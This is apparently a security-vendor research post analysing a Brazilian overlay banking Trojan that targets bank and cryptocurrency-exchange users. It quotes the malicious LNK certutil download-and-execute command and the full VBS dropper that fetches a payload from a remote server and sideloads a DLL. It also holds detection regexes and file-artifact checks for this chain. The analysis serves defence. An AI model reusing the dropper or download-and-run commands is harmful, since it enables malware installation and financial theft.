In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.
Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.
Compromising Brazilian Users One Remote Session at a Time
IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.
Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.
The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.
Rising Interest in Cryptocurrency
Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.
Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.
A Typical Infection Routine
A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:
- The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
- The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
- The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
- The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
- The VBS script executes the malware, infecting the device.
- Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
- After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
- The malicious DLL component gives the malware its remote control capabilities.
Zooming In on the Malicious LNK File
A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.
First, the malicious script is downloaded from the remote server under the name “tudodebom” (the LNK command line is reproduced here in two parts):
C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f "https://remoteserver/turbulencianoar/tudodebom.txt" %temp%\tudodebom.txt && cd %temp% &&
- -urlcache displays or deletes URL cache entries.
- -split -f forces fetching of a specific URL and updating of the cache.
Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:
rename "tudodebom.txt" "JNSzlEYAIubkggX.vbs" && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs
The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:
hXXps://remoteserver/turbulencianoar/tudodebom.txt
Lastly, the malware executes the malicious VBS script.
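The certutil download, rename-to-.vbs and cmd.exe /k stages described above can be scored from process-creation command lines. This is an added example, not code from the article: the sample lines are constructed (the first mirrors the LNK command quoted above, with the article’s defanged host kept as-is; the others are a benign certutil use and a download without the later stages).

```python
import re

# Constructed sample process-creation command lines. The first is modelled on the LNK
# command quoted in the article (defanged host kept); the others are benign or partial.
SAMPLE_CMDLINES = [
    'C:\\Windows\\System32\\cmd.exe /V /C certutil.exe -urlcache -split -f '
    '"https://remoteserver/turbulencianoar/tudodebom.txt" %temp%\\tudodebom.txt && cd %temp% '
    '&& rename "tudodebom.txt" "JNSzlEYAIubkggX.vbs" && C:\\windows\\system32\\cmd.exe /k JNSzlEYAIubkggX.vbs',
    'certutil.exe -verify -urlfetch C:\\certs\\server.cer',
    'certutil.exe -urlcache -split -f http://example.invalid/update.txt C:\\Users\\u\\update.txt',
]

# certutil used as a downloader: -urlcache together with -split -f and a URL
CERTUTIL_DL = re.compile(
    r'certutil(?:\.exe)?\s+(?=.*-urlcache)(?=.*-split)(?=.*-f\b).*?(https?://\S+)', re.I)
# a downloaded .txt renamed to a script extension
RENAME_SCRIPT = re.compile(
    r'\brename\s+"?[^"\s]+\.txt"?\s+"?([^"\s]+\.(?:vbs|js|ps1|bat))"?', re.I)
# the renamed file handed to cmd.exe /k
CMD_EXEC = re.compile(r'cmd(?:\.exe)?\s+/k\s+(\S+)', re.I)

def score_cmdline(cmdline):
    """Return (severity, findings) for one command line."""
    findings = []
    m = CERTUTIL_DL.search(cmdline)
    if m:
        findings.append(('certutil_download', m.group(1).strip('"')))
    m = RENAME_SCRIPT.search(cmdline)
    if m:
        findings.append(('txt_renamed_to_script', m.group(1)))
    m = CMD_EXEC.search(cmdline)
    if m:
        findings.append(('cmd_k_exec', m.group(1)))
    # one stage alone is low-confidence; all three stages together reproduce the LNK chain
    severity = ('none', 'low', 'medium', 'high')[len(findings)]
    return severity, findings

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(score_cmdline(line)[0], '->', line[:60])
```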
Examining the VBS Script
The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:
"C:\AV product_" + RandomName + "\"
After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.
Interesting elements in this routine include:
- The use of legitimate remote servers to host attack tools;
- The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
- The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.
Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject("WScript.Shell")
ubase = "https://remoteserver/turbulencianoar/AuZwaaU.zip"
randname = getrandomstring()
exerandom = "AV product.SystrayStartTrigger-" + randname
filezip = "AuZwaaU.zip"
deffolder = "C:\AV product_" + randname + "\"
filesuccess = objShell.ExpandEnvironmentStrings("%TEMP%") + "\java_install.log"
fileexe = "AuZwaaU.exe"
filedll = "AuZwaaU.sys"
Set objFSO = CreateObject("Scripting.FileSystemObject")
' Run-once marker: a previous execution leaves java_install.log in %TEMP%
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write " "
objFile.Close
'WScript.Echo msg
' Download the payload archive into %TEMP% via MSXML and an ADODB binary stream
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip, 2
end with
WScript.Sleep 5000
' Extract the archive with the Shell.Application COM object, then delete it
set objShellApp = CreateObject("Shell.Application")
set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip).items
objShellApp.NameSpace(objShell.ExpandEnvironmentStrings("%TEMP%")).CopyHere(FilesInZip)
WScript.Sleep 5000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip
' Stage the renamed antivirus binary and the DLL (shipped as .sys) side by side
objFSO.CreateFolder deffolder
WScript.Sleep 3000
objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & fileexe, deffolder & exerandom & ".exe"
objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filedll, deffolder & "AV product.OE.NativeCore.dll"
objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\msvcp120.sys", deffolder & "msvcp120.dll"
objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\msvcr120.sys", deffolder & "msvcr120.dll"
objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\LOG", deffolder & "LOG"
WScript.Sleep 5000
' Launch the host binary through a throwaway batch file in %TEMP%, then remove it
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("WScript.Shell")
outFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write "@echo off" & vbCrLf
objFile.Write "@cd " & deffolder & vbCrLf
objFile.Write "start " & exerandom & ".exe" & vbCrLf
objFile.Close
objShell.Exec(objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat")
WScript.Sleep 10000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat"
Set objShell = Nothing
Set objFSO = Nothing
Set objShellApp = Nothing
End If
' Builds the random suffix shared by the staging folder and the renamed executable
Function getrandomstring()
Dim intMax, k, intValue, strChar, strName
Const Chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
intMax = 6
Randomize()
strName = ""
For k = 1 To intMax
intValue = Fix(62 * Rnd())
strChar = Mid(Chars, intValue + 1, 1)
Randomize()
intValue = Fix(62 * Rnd())
strChar = strChar & Mid(Chars, intValue + 1, 1)
strName = strName & strChar
If (k < 6) Then
strName = strName & ""
End If
Next
getrandomstring = strName
End Function
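The naming convention noted above, together with the file names the script uses, gives a host-side check. This is an added example and not code from the article: it scores a constructed file inventory against the dropper’s on-disk layout; “AV product” is the article’s redaction of the vendor name, and the sample paths and the TEMP location are assumptions.

```python
import ntpath
import re

# Names taken from the dropper script above; "AV product" is the article's redaction of
# the abused antivirus vendor name. getrandomstring() yields at most 12 ASCII letters (six
# rounds of two draws from a 52-letter alphabet; out-of-range draws yield nothing).
FOLDER_RE = re.compile(r'^[A-Za-z]:\\AV product_([A-Za-z]{0,12})$', re.I)
EXE_RE = re.compile(r'^AV product\.SystrayStartTrigger-([A-Za-z]{0,12})\.exe$', re.I)
SIDELOADED_DLL = 'av product.oe.nativecore.dll'
RUNTIME_DLLS = {'msvcp120.dll', 'msvcr120.dll'}
MARKER = 'java_install.log'   # run-once marker the script writes to %TEMP%
# Constructed inventory (assumed paths): one infected layout plus a legitimate install.
TEMP = r'C:\Users\victim\AppData\Local\Temp'
SAMPLE_INVENTORY = [
    r'C:\AV product_QxLmWaTzKbPe\AV product.SystrayStartTrigger-QxLmWaTzKbPe.exe',
    r'C:\AV product_QxLmWaTzKbPe\AV product.OE.NativeCore.dll',
    r'C:\AV product_QxLmWaTzKbPe\msvcp120.dll',
    r'C:\AV product_QxLmWaTzKbPe\msvcr120.dll',
    r'C:\AV product_QxLmWaTzKbPe\LOG',
    TEMP + r'\java_install.log',
    r'C:\Program Files\AV product\AV product.SystrayStartTrigger.exe',
    r'C:\Program Files\AV product\AV product.OE.NativeCore.dll',
]

def find_dropper_artifacts(paths, temp_dir):
    by_dir = {}
    for p in paths:
        d, name = ntpath.split(p)
        by_dir.setdefault(d, []).append(name)
    findings = []
    for d, names in by_dir.items():
        fm = FOLDER_RE.match(d)
        if not fm:
            continue
        lower = {n.lower() for n in names}
        suffixes = [m.group(1).lower() for m in map(EXE_RE.match, names) if m]
        score = 0
        if SIDELOADED_DLL in lower:
            score += 2   # hijack DLL dropped beside the signed host binary
        if RUNTIME_DLLS <= lower:
            score += 1   # runtime DLLs renamed back from .sys
        if suffixes:
            score += 1   # renamed host exe present
        if fm.group(1).lower() in suffixes:
            score += 1   # exe and folder share the same random suffix
        if score:
            findings.append({'dir': d, 'score': score, 'reason': 'overlay Trojan staging folder'})
    if MARKER in {n.lower() for n in by_dir.get(temp_dir, [])}:
        findings.append({'dir': temp_dir, 'score': 1, 'reason': 'dropper run-once marker'})
    return findings
```

A legitimate install under Program Files carries the same vendor file names but not the random-suffix folder, so it does not score.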
Remote Overlay Images
Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.
To accomplish this goal, the threat actors have created a number of overlays that match cryptocurrency platforms used in Brazil (we have censored the platform’s logo below). In each case, the overlay prompts the user to verify his or her email address and identity and then to confirm the account with a fresh one-time password from whichever token method the user has set up.
Figure 1: Fake overlay screen asks users to provide information about their identity.
Figure 2: Fake overlay screen asks users to submit a token code.
Overlays for 2FA requests match the targeted platform’s preferred user authentication elements and include single sign-on (SSO) through email and social accounts:
Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.
Mitigate Financial Cybercrime Risks
Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high because each campaign reaches a large number of users, the risk can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.
Security Threat Researcher, IBM Security (Trusteer)
Threat Intelligence Expert, IBM